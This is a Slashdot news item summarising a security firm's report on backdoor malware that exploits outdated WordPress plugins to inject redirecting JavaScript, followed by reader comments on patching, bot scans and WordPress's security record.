Hundreds of WordPress Sites Infected By Recently Discovered Backdoor (arstechnica.com) 32
Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week. Ars Technica reports: The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It's also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system. "If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Dr.Web researchers wrote. "As a result, when users click on any area of an attacked page, they are redirected to other sites."
Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It's possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware. "If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server," the Dr.Web writeup explained. "With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first -- regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to." The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years.
Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It's possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware. "If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server," the Dr.Web writeup explained. "With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first -- regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to." The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years.
Everybody Panic Now! *dancy tune* (Score:1)
"HUNDREDS IF NOT THOUSANDS" is still a drop in a bucket for wordpress.
But don't let that stop the calls for all of us to RUN AROUND, SCREAM AND SHOUT!!!1!
Funny how wordpress is built upon an interpreted language with a devoted following of apologists and yet somehow wordpress installations keep on springing leaks. Even if the total numbers of affected sites per plugin are low. "Hundreds if not thousands of sites" took 30 different plugins this time. Methinks the sheer number of plugins available for wordp
Re: (Score:3)
Anyways, back in the real world, the very large WP site I manage doesn't use any of these plugins; we update all of our plugins weekly with every patch, and have no issues.
Re: (Score:2)
THIS! It's not like it's hard to keep the plugins up to date.
Re: (Score:3, Insightful)
Assuming your plugins get updated.
Re: (Score:3)
It's right in the summary, all of the relevant plugins have updates that fix the vulnerability.
Re: (Score:2)
Re: (Score:2)
It's very easy to keep a site stable with no traffic.
Re:Everybody Panic Now! *dancy tune* (Score:4, Insightful)
That can be said of pretty much everything: drills, batteries, knives, saws, cars, trucks, stoves, walking, running, hiking, phones, computers, engines, electricity, ladders, ropes, ... getting the point?
Much of life is compromise. It's been around for a long time, and sadly like most software it's had its growing pains and bugs. If WordPress was so bad it would go the way of Windows Vista.
I'm admin for some WordPress sites for about 15 years. The _only_ bug I've ever seen is some kind of "trackback" or something similar where every now and then a spam comment will show up in the queue for posting.
There are so many themes and plugins available. Many great tools that give site designers great creative power and flexibility. I'm not an artist so someone will ask me to install a theme or plugin, which is super easy, and they can do their thing and I do what I'm better at.
Easy fix (Score:3)
Disable JavaScript.
Re: (Score:2)
Right, easy! As long as you're literally the *only* user of the web site.
Re: (Score:3)
Slashdot seems to work pretty well without JavaScript. And I'm pretty sure I'm not the only user here.
Re: (Score:2)
What does that have to do with WordPress back doors? Just because YOU disable JavaScript, doesn't mean the back-door abusers will disable JavaScript.
Re: (Score:2)
Disable JavaScript.
That's what I said in my very first post here 25-ish years ago. I still say it, and try to disable javascript as much as possible.
I don't hate the idea of client-side processing, but imho it's way overused, ends up increasing network traffic, rather than reducing it.
For sure one great use of javascript is where you want to update something on a page without reloading the entire page.
Use cases like that are great. But looking at what's being done, (ever look at a "wix" site's source? you might puke), and
The bots are constantly scanning for WP (Score:5, Informative)
My .NET website regularly gets hit with requests to URLs like /wp-admin and /wp-content and other WordPress paths. Since it's a .NET site, these always return 404.
If my little-known site gets hit by these crawlers, it's hard to imagine how many times bigger sites are bombarded.
Re: (Score:2)
It is probably just complete IPv4 scans, so you get the same as everybody. They are not hard to do. I simulated that about 15 years back and came up with something like 10 days. With faster last-mile speeds, the number had gone down. BTW, IPv6 only partially prevents this, it depends on how your IP is chosen from the range you get.
I Ditched Wordpress (Score:5, Interesting)
I found a theme that installed a cronjob. I immediately ditched Wordpress. You don't have to worry about malicious plugins with a static site.
Re: (Score:2)
Re: (Score:2)
I'm aware of those scripts. This was not one of them. Wordpress cronjobs don't encrypt their contents and call skechy looking servers.
Re: (Score:2)
As noted above, I've been admin for a few WordPress sites and I just double-checked, no WordPress cron jobs.
Do you know any names?
cron.daily, weekly, monthly, ??
Re: (Score:2)
Not trying to make excuses, but on my installs, WP wouldn't be able to set a cron because it doesn't have permissions.
OMG, 0.00000001% of WP sites ... (Score:4, Insightful)
... backdoored by some n00by plugin built by someone who shouldn't be let near a keyboard, let alone a public repo.
We're all gonna die! ...
There is an epic army of people guarding and maintaining the WP ecosystem that has an installbase that dwarfs anything else. Conservative estimates clock 40+ million active installations of WP. Roughly a third of the web. Entire global package filter networks are built around tracking and shutting down WP exploits - which, btw. are actually quite very rare. Way more rare that some "professional" enterprise behemoth with a meager base of a few thousand installations.
Bottom line:
Everyone Chill. These exploits surface and are communicated so quickly precisely because there are a hundred thousand eyes observing.
Re: (Score:2)
while I agree with your advice to everyone to "chill out" and may have miss read the intent of your post as it is early and I have yet to have any coffee I would like to point out a tiny fact hat you seem to have overlooked
from the summary;
They said the malware may have been in use for three years.
So in this case your claim that
These exploits surface and are communicated so quickly precisely because there are a hundred thousand eyes observing.
is in this case wrong as the
"...epic army of people guarding and maintaining the WP ecosystem ..."
failed in thier task of guarding the WP ecosystem
My webite also infected (Score:1)
https://clavick.com/convention... [clavick.com]
Split WP in half? (Score:3)
It feels to me like there's something to be said for splitting WP in half. One half does the rendering, the other half does the admin. That way, plugins also get split in half, and the dangerous half (that's got it butt hanging out in the wild) might well mess up rendering, but can't install a botnet or modify the content itself.
WC is on the list. Only 100s infected? (Score:2)
Malware targets 32-bit versions of Linux (Score:1)
Hundreds = Slashdot post = PAGE VIEWS!!! (Score:2)
Anything goes for the front page these days. If someone successfully gets a cat video on the front page, we can just call it quits.
KISS (keep it simple stupid).... (Score:2)
The more complicated you make something, the easier it is to break ...every single time.